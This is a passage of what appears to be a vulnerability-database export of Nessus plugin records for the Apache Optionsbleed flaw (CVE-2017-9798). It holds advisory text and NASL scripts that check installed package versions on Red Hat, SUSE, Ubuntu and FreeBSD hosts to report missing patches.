value:\"https://access.redhat.com/errata/RHSA-2017:2882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-9798\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2882\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-debuginfo-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-devel-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"httpd-manual-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-tools-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_ldap-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_proxy_html-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_session-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_ssl-2.4.6-67.el7.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:12:22", "description": "This update for apache2 fixes one issues. This security issue was fixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-13T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2", "p-cpe:/a:novell:suse_linux:apache2-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-debugsource", "p-cpe:/a:novell:suse_linux:apache2-example-pages", "p-cpe:/a:novell:suse_linux:apache2-prefork", "p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-utils", "p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-worker", "p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2718-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103833", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2718-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103833);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172718-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b3bb4ad6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1682=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1682=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1682=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debugsource-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-example-pages-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.16-20.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:31", "description": "According to its banner, the version of Apache running on the remote host is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP vulnerability related to the <Limit {method}> directive in an .htaccess file.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-13T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_28.NASL", "href": "https://www.tenable.com/plugins/nessus/103838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103838);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n\n script_name(english:\"Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.4.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.28 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nconstraints = [\n { \"min_version\" : \"2.4\", \"fixed_version\" : \"2.4.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:57", "description": "Hanno Bock discovered that the Apache HTTP Server incorrectly handled Limit directives in .htaccess files. In certain configurations, a remote attacker could possibly use this issue to read arbitrary server memory, including sensitive information. This issue is known as Optionsbleed.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : apache2 vulnerability (USN-3425-1) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3425-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3425-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103356);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"USN\", value:\"3425-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : apache2 vulnerability (USN-3425-1) (Optionsbleed)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Bock discovered that the Apache HTTP Server incorrectly handled\nLimit directives in .htaccess files. In certain configurations, a\nremote attacker could possibly use this issue to read arbitrary server\nmemory, including sensitive information. This issue is known as\nOptionsbleed.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3425-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-bin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.7-1ubuntu4.18\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.18-2ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"apache2-bin\", pkgver:\"2.4.25-3ubuntu2.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-bin\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:57", "description": "The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache22", "p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "href": "https://www.tenable.com/plugins/nessus/103344", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF 